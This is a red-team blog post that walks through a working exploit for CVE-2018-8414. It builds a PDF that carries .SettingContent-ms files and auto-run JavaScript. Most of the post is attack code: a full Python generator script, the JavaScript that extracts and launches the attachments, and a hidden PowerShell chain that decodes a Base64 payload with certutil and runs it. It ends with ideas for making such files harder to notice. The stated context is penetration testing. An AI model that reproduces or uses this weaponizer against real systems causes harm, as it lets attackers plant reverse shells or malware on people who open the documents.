CVE-2018-8414: Abusing PDF files

Introduction

This blog covers the development of a PoC for the public vulnerability CVE-2018-8414. A member of the red team approached me because one of our client’s websites accepted PDF files, and he was trying to develop a PoC for this known vulnerability by inserting the exploit file as an attachment to a PDF. He had hit a roadblock and had to continue penetration testing, so he asked if I could take it on, and the journey began.

The first section of the blog introduces the vulnerability and what exactly we will be exploiting. We will then cover a script for embedding files into PDFs. At the very end I will discuss some improvements that could be made to enhance this sort of attack, and there’s a video of the demo in action.

Requirements

A couple of things to note about this exploit:

Vulnerable Systems: Windows 10 Pro x64 – 1803 released on April 30, 2018 (And older)
Vulnerable Software: Adobe Acrobat Reader DC 18.011.20055 (July 10, 2018 update and older)
Abused Shell: Powershell v1.0

This vulnerability affects Office 365, Adobe Acrobat Reader DC (as we will see) as well as older versions of Firefox and Chrome. Check out the CVE page for a more detailed description of the updates.

The script was written in Python. The tools I used were:

Python 3.7.4
PyPDF4 library
pdftk (A command line tool for processing pdf files on Linux)

Background Info

.SettingContent-ms Files

These XML files were introduced by Microsoft in Windows 10. They contain settings content for Windows functions, such as how updates are installed or what default apps should be used to open particular file types.

The vulnerability

In 2018, a Windows vulnerability was disclosed by a security researcher who goes by enigma0x3. .SettingContent-ms files have an interesting element, <DeepLink>. When a .SettingContent-ms file is opened, the <DeepLink> element can make a call to any executable. However, this element has a 517 character limit, which makes it hard to inject foreign .exe payloads.

We work around this by using the <Icon> element, which has no such limit and can take a payload of any size you choose to deliver. Obviously the smaller the payload the better, as it will be less noticeable in the final malicious file’s size.

Figure 1.1: The XML format and the element abused in the Python script PoC

As seen in Figure 1.1, the content of the <DeepLink> element will be changed. It can make calls to programs such as Command Prompt or PowerShell, which an attacker can then use to drop off a payload.

DeepLink powershell

"<DeepLink><![CDATA[%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c $file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name; $fpath = $env:TEMP + '\\' + $file; $Store = Select-String -Path $fpath -Pattern '<Icon>';$Store = $Store -replace([regex]::Escape($fpath + ':7:<Icon>'), '');$Store = $Store -replace('</Icon>', '');Invoke-Expression $Store; certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe; Invoke-Expression ($env:TEMP + '\evil.exe')]]></DeepLink>"

The string above is the one I will place in the <DeepLink> element in this demo. It finds the Base64 encoded payload, decodes it, saves the contents to an .exe file, and then executes it.

Figure 1.2: The XML format and the element used to store the payload in the Python script PoC

Since we are using PowerShell, the <Icon> element holds a PowerShell command, which writes the payload into a file:

Icon Tag Payload

<Icon>Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n</Icon>

Python scripting

I wrote a Python script that takes a given PDF, a payload to embed into it and a name for the new PDF:

./pdfexploit.py -i Input_PDF -p Payload -o Output_PDF

The -i option is the input PDF in which we will hide the malware, -p is the payload file we want to hide (such as a Meterpreter reverse shell or any other .exe file), and -o is the output path where the new malicious PDF will be created.
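The option handling itself is not shown in this post, so the following is only a minimal sketch of how the three options could be parsed with argparse. The long option names (--input, --payload, --output) and the build_parser helper are my assumptions, chosen so that the parsed values line up with the args.input, args.payload and args.output names used in the later snippets.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Build a parser for the three options described above (hypothetical helper)."""
    parser = argparse.ArgumentParser(description="Embed a file into a copy of a PDF")
    # The long names are assumptions; they produce args.input, args.payload, args.output
    parser.add_argument("-i", "--input", required=True, help="PDF to copy")
    parser.add_argument("-p", "--payload", required=True, help="file to embed")
    parser.add_argument("-o", "--output", required=True, help="PDF to write")
    return parser
```

Calling build_parser().parse_args() at the top of the script would then give the global args object that the functions below read from.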

The following explains the operation of this script.

Exploit chain

These are the steps required to exploit the vulnerability:

A regular, harmless PDF is opened in the Python script.
JavaScript is embedded in the PDF file to launch the files embedded within the document.
The first .SettingContent-ms file is embedded within the PDF document.
    1. This .SettingContent-ms file allows us to launch a PowerShell window by abusing the <DeepLink> element.
The second .SettingContent-ms file is embedded within the PDF document.
    1. This .SettingContent-ms file hosts the payload alongside a PowerShell instruction that outputs the payload into a .b64 file.
    2. We store the payload in the <Icon> element since it does not have a character limit.
    3. We store the payload in a separate file because we cannot parse the data properly if both are contained in the same file, since the <DeepLink> content overlaps with the <Icon> content.
Both files are embedded in the PDF using a command line tool, and a malicious PDF is output.
Once the PDF is opened, a dialog box asks the user to confirm whether they would like to open the attachments. Once they confirm, the malicious payload is executed.

This is a general outline of what happens over the course of the script. With that in mind, we can dig into the technical parts.

Embedding auto-run JavaScript

Since the probability of a user actually clicking the attachment is low, we can trigger the files to open automatically when the PDF is opened. By default the user is prompted with a small dialogue box. If they have previously selected “Always allow opening files of this type”, the files launch immediately; if they selected “Never allow opening files of this type”, the attachment has to be opened manually.

The JS is embedded into a PDF using the following Python function:

# Create malicious pdf
def addJS():
    malicious_pdf = PdfFileWriter()
    # Open file passed as -i parameter
    with open(args.input, "rb") as f:
        pdfReader = PdfFileReader(f)
        # Copy pages of original pdf file to malicious pdf file
        for page in range(pdfReader.numPages):
            pageObj = pdfReader.getPage(page)
            malicious_pdf.addPage(pageObj)
        malicious_pdf.addJS("var files = [\"Payload\", \"psFile\"]; for (var i = 0; i < files.length; i++) { this.exportDataObject( {cName: files[i] + \".SettingContent-ms\", nLaunch: 2} ); }")
        # Create malicious pdf using -o parameter as file name
        output = open(args.output, "wb+")
        malicious_pdf.write(output)
        output.close()

Using the PyPDF4 library we create a PdfFileWriter() object. This is used to copy the contents of the input PDF into another PDF that also includes the embedded JavaScript. We copy each page in the for loop, then add our JavaScript to the newly created PDF using PyPDF4’s built-in function addJS(). Lastly we write the object to the output path provided by the user, creating a new PDF which contains the contents of the initial PDF with the addition of the JavaScript.

var files = ["Payload", "psFile"];

for (var i = 0; i < files.length; i++) {
    this.exportDataObject( {cName: files[i] + ".SettingContent-ms", nLaunch: 2} );
}

The JavaScript is pretty simple. We create an array holding the names of the malicious files we embedded, then iterate through it with a for loop. For each entry, the this.exportDataObject() function extracts the attachment from the PDF. It is given two parameters. The first, cName, is the name of the file, which is concatenated with “.SettingContent-ms” at run-time so that the extracted file carries the extension it needs to execute. The second, nLaunch, saves and opens the attachment when given a value of 2.

As shown above, the JavaScript will extract the embedded files. This only happens after the user has hit ‘OK’ on the following popup:

Figure 3.1: Pop-Up Produced by PDF

The figure above shows the pop-up and the name of the file to be opened. The name can obviously be changed to be less conspicuous, but once the user clicks ‘OK’ the embedded files are extracted automatically and whatever calls are hidden in the DeepLink element are executed.

Base64 encoding the icon file

After embedding the JavaScript into the PDF, we move on to creating the files. This starts with checking the encoding of the payload. The user can embed any sort of payload into the PDF file. Most commonly it will be a binary executable, or its Base64 representation if they chose to encode the file themselves beforehand. The script handles both scenarios with a Base64 encoding check and behaves differently depending on whether the payload is already encoded. Below we can see the Base64 check code.

# Check if payload provided is base64 encoded
def isBase64(payload, filename):
    isb64 = True
    if(filename.endswith('.b64')):
        try:
            base64.b64decode(payload)
        except binascii.Error:
            isb64 = False
    else:
        isb64 = False
    return isb64

This checks whether the payload file is in Base64 by first checking the filename’s extension and then checking whether its contents can actually be decoded.

Creating the malicious .SettingContent-ms Files

After checking whether the payload was Base64 encoded, we pass its raw contents to the create_putfile function. This creates the XML formatted settings content file with the customised <Icon> content containing the payload.
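One caveat with this kind of check: by default, base64.b64decode() silently discards characters outside the Base64 alphabet before decoding, so some non-Base64 input still decodes without an error. The following is a hedged sketch of a stricter content check using the validate=True option. The function name is_strict_base64 is hypothetical and not part of the original script.

```python
import base64
import binascii


def is_strict_base64(data: bytes) -> bool:
    """Return True only if data is valid Base64 once whitespace is removed."""
    # Encoded files are often wrapped across lines, so drop ASCII whitespace first
    compact = b"".join(data.split())
    if not compact:
        return False
    try:
        # validate=True rejects any character outside the Base64 alphabet
        base64.b64decode(compact, validate=True)
    except binascii.Error:
        return False
    return True
```

For example, b"abcd!!!!" decodes without complaint under the default settings because the exclamation marks are dropped, whereas is_strict_base64(b"abcd!!!!") returns False.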

# Create payload file to embed
def create_putfile(payload, b64):
    putfile = scm.split("\n")
    if b64:
        payload = payload.decode()
        payload = payload.split('\n')
        payload = "".join(payload)
        putfile[6] = "Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n"
    else:
        payload = base64.b64encode(payload)
        payload = payload.decode()
        payload = payload.split('\n')
        payload = "".join(payload)
        
        putfile[6] = "Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n"
    
    return "\n".join(putfile)

First we split the contents of the XML file seen at the beginning into lines and store them in a list. Using the boolean b64 we check whether the payload was already encoded; if so, we simply decode it from bytes to str (not from Base64 to ASCII). We then strip the payload of any newlines, since they would halt the program on execution. Lastly we edit the Icon’s content so that it holds the payload and a command that outputs it to a file called evil.b64 in the TEMP path, and then add a \n, otherwise the closing Icon tag will not be detected in the XML file.

In the case where the payload isn’t Base64 encoded, we simply encode it before passing it through the same process.

Now that we have a file containing the payload, we need to create another file which includes the PowerShell that finds the contents of the Icon tag in the first file and executes them. We will call this file psFile, which is created using the create_powershell function.
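Since both branches end with the same newline stripping, the normalisation step can be sketched as one small helper. This is only an illustration under my own naming (to_single_line_b64 is hypothetical), and it differs slightly from the function above in that it removes all whitespace, including the "\r" left behind by Windows line endings, rather than only "\n".

```python
import base64


def to_single_line_b64(payload: bytes, already_b64: bool) -> str:
    """Return the payload as one Base64 line, encoding it first if needed."""
    if not already_b64:
        payload = base64.b64encode(payload)
    # str.split() with no arguments splits on any whitespace, so joining the
    # pieces removes "\n", "\r" and stray spaces in one pass
    return "".join(payload.decode("ascii").split())
```

Note that base64.b64encode() never inserts line breaks itself, so the stripping only matters for files that were encoded beforehand by a tool that wraps its output.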

# Create powershell script to embed in file and execute payload
def create_powershell():
    psFile = scm.split("\n")
    psFile[5] = "<![CDATA[%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c $file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name; $fpath = $env:TEMP + '\\' + $file; $Store = Select-String -Path $fpath -Pattern '<Icon>';$Store = $Store -replace([regex]::Escape($fpath + ':7:<Icon>'), '');$Store = $Store -replace('</Icon>', '');Invoke-Expression $Store; certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe; Invoke-Expression ($env:TEMP + '\evil.exe')]]>"
    
    return "\n".join(psFile)

As we did previously, we split the XML file into a list, and this time we change the DeepLink’s contents to our PowerShell script. I’ll break this up into several parts so it’s clearer. For starters, everything is encapsulated in <![CDATA[powershell]]>, otherwise the semi-colons will cause it to break and it won’t complete.

%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c

This line launches powershell.exe with special flags. -Windowstyle hidden hides the PowerShell window, so the user will barely catch a glimpse of it. -ep bypass sets the execution policy to Bypass for this session so that nothing is blocked, and -c (short for -Command) tells PowerShell to run the rest of the string as a command. Neither flag grants elevated privileges; the commands run as the current user.

$file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name;

Knowing that Adobe stores its attachments in the temp folder, and having named the payload ourselves (in the script it’s set to Payload.SettingContent-ms regardless of the input given), we can search the temp folder for a file with that name and store the result in the $file variable.

$fpath = $env:TEMP + '\\' + $file;

Because of the -name switch, the path returned is relative to the folder being searched, so it excludes the temporary directory and all parent directories. We therefore concatenate it with the TEMP path, and the full path is stored in the $fpath variable.

$Store = Select-String -Path $fpath -Pattern '<Icon>';

Now that we have the full path to the file, we pull out the line that holds the Icon content, including the tags themselves. This is stored in the $Store variable.

$Store = $Store -replace([regex]::Escape($fpath + ':7:<Icon>'), '');
$Store = $Store -replace('</Icon>', '');

PowerShell prefixes the matched string with the path of the file it came from and the line number of the match, here ‘:7:’, so we need to strip these along with the opening tag. We use [regex]::Escape because the file path contains backslashes, and passing it to -replace unescaped results in an error. We replace the prefix with nothing and update our variable. The second line strips the trailing Icon tag and updates the variable one last time.
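To make the role of the regex escape more concrete, the same prefix stripping can be mimicked in Python, where re.escape() plays the part of [regex]::Escape. This is an illustration only: the helper name, the sample path and the sample command are made up, and it assumes the opening and closing tags sit on the matched line.

```python
import re


def strip_match_prefix(match_line: str, path: str, line_no: int) -> str:
    """Remove the 'path:line:<Icon>' prefix and the closing tag from a match."""
    # Escaping turns the backslashes in the path into literal characters;
    # unescaped, a sequence such as \T would be rejected as a bad regex escape
    prefix = re.escape(f"{path}:{line_no}:<Icon>")
    body = re.sub("^" + prefix, "", match_line)
    return body.replace("</Icon>", "")


sample_path = r"C:\Temp\example.SettingContent-ms"  # hypothetical path
sample = sample_path + ':7:<Icon>Write-Output "data"</Icon>'
print(strip_match_prefix(sample, sample_path, 7))  # prints: Write-Output "data"
```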

Invoke-Expression $Store

Invoke-Expression takes a string and runs it as a PowerShell command. As mentioned above, the Icon tag holds a Write-Output command, which is the equivalent of echo in cmd. Its argument is our Base64 encoded payload, and its output is redirected to create the evil.b64 file in our temp directory. Now that $Store is stripped of the unnecessary information, Invoke-Expression executes its contents as a PowerShell command.

certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe;

Using Microsoft’s built-in command certutil we can decode the Base64 file and choose an output location.

Invoke-Expression ($env:TEMP + '\evil.exe')

Lastly, we want to execute the malicious payload, so we concatenate the file name with its path. Since it is now a string, we can once again call Invoke-Expression to execute it.

Putting it all together

Now that we’ve carefully crafted our XML files, we must embed them into the PDF so the JavaScript actually has something to extract.

# Insert payload and powershell script into pdf
def insertMaliciousFiles():
    raw_payload = ""
    # Read contents of payload file
    with open(args.payload, "rb") as payload:
        raw_payload = payload.read()
    
    payload.close()
    # Check if payload is base64 encoded
    var = isBase64(raw_payload, args.payload)
    # Create malicious files
    putFile = create_putfile(raw_payload, var)
    psFile = create_powershell()
    files = [putFile, psFile]
    fileNames = ["Payload.SettingContent-ms", "psFile.SettingContent-ms"]
    # Create the files, write to them and then attach them using pdftk
    malput = [args.output]
    fileNames.append(malput[0])
    for i in range(len(files)):
        tmp = open(fileNames[i], "w")
        tmp.write(files[i])
        tmp.close()
        malput.append('out' + str(i) + '.pdf' )
        fileNames.append(malput[i+1])
        os.system('pdftk ' + malput[i] + ' attach_file ' + fileNames[i] + ' output ' + malput[i+1])
    
    print("Attached encoded files!")
    return fileNames

We start by opening the payload file and reading its contents, storing them in the raw_payload variable. This function essentially checks if the payload is encoded in Base64, and then creates the two malicious files, one holding the payload, the other holding the Powershell script. We then attach the malicious files to a PDF using the command line tool pdftk.

The reason we created malput, and had to open and write to the files, is that we need to use a command line tool called pdftk. Unfortunately I could not find a Python PDF library that supports attaching several files, whereas this command line tool can attach them one by one. Editing the PyPDF4 library to add a method for multiple attachments, as originally planned, turned out to be rather cumbersome, so I resorted to this process. Using pdftk we take the output file containing the JavaScript and attach the payload file, and the result is written to an intermediate file. This loops until all files are attached, which in this case is only twice. The function then returns the fileNames list, which holds all the files created.
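Building the command by string concatenation breaks as soon as a file name contains a space. As a hedged alternative, the call can be expressed as an argument list and run with subprocess. The helper names below are hypothetical, and the sketch uses attach_files, the operation name given in the pdftk manual, rather than the attach_file spelling used in the script above.

```python
import subprocess
from typing import List


def pdftk_attach_command(src_pdf: str, attachment: str, dst_pdf: str) -> List[str]:
    """Build the argument list for attaching one file to a PDF with pdftk."""
    return ["pdftk", src_pdf, "attach_files", attachment, "output", dst_pdf]


def attach(src_pdf: str, attachment: str, dst_pdf: str) -> None:
    """Run pdftk (assumed to be installed and on PATH) to attach one file."""
    # check=True raises CalledProcessError if pdftk exits with an error,
    # instead of failing silently the way os.system() would
    subprocess.run(pdftk_attach_command(src_pdf, attachment, dst_pdf), check=True)
```

Because each argument is passed separately, no shell is involved and no quoting of file names is needed.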

Cleaning Up (Attacker Side)

This was a bonus function I added to the script. It deletes the extra files created along the way so the attacker isn’t flooded with useless files.

# Delete extra files created
def cleanup(fileNames):
    for i in range(len(fileNames)-1):
        os.system('rm ' + fileNames[i])
    os.system('mv ' + fileNames[len(fileNames)-1] + ' ' + args.output)

As you can see it is pretty simple. I take the list of file names returned by the insertMaliciousFiles() function and iterate through its elements, deleting each one using Python’s os library and the rm command. Once I’ve deleted all the files except the last one, I leave the for loop and simply rename the remaining file to what the attacker originally gave as the output argument.
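The rm and mv commands tie this function to Unix-like systems. A portable variant, sketched below under my own assumptions, uses os.remove() and os.replace() instead of shelling out. Unlike the original, it takes the final name as a parameter rather than reading the global args object.

```python
import os
from typing import List


def cleanup(file_names: List[str], final_name: str) -> None:
    """Delete every intermediate file, then rename the last one to final_name."""
    *intermediate, last = file_names
    for name in intermediate:
        # Skip names that were never created or have already been removed
        if os.path.exists(name):
            os.remove(name)
    # os.replace overwrites final_name if it already exists
    os.replace(last, final_name)
```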

Conclusion

The exploit can be powerful enough to drop a reverse shell on an unsuspecting victim. There were several roadblocks I faced, primarily with embedding the files and creating the PowerShell scripts. Since we are not embedding the payload in the same file, we could hide it in less conspicuous files, possibly a .txt file or a .csv which only contains the PowerShell command and the payload.

Another possible option to explore further is to embed the .SettingContent-ms files in images using Steganography.js, and then embed those images in the PDF to seem less obvious. We could then possibly use the embedded JavaScript in the PDF to unearth the files and execute them.

For our latest research, and for links and comments on other research, follow our Lab on Twitter.
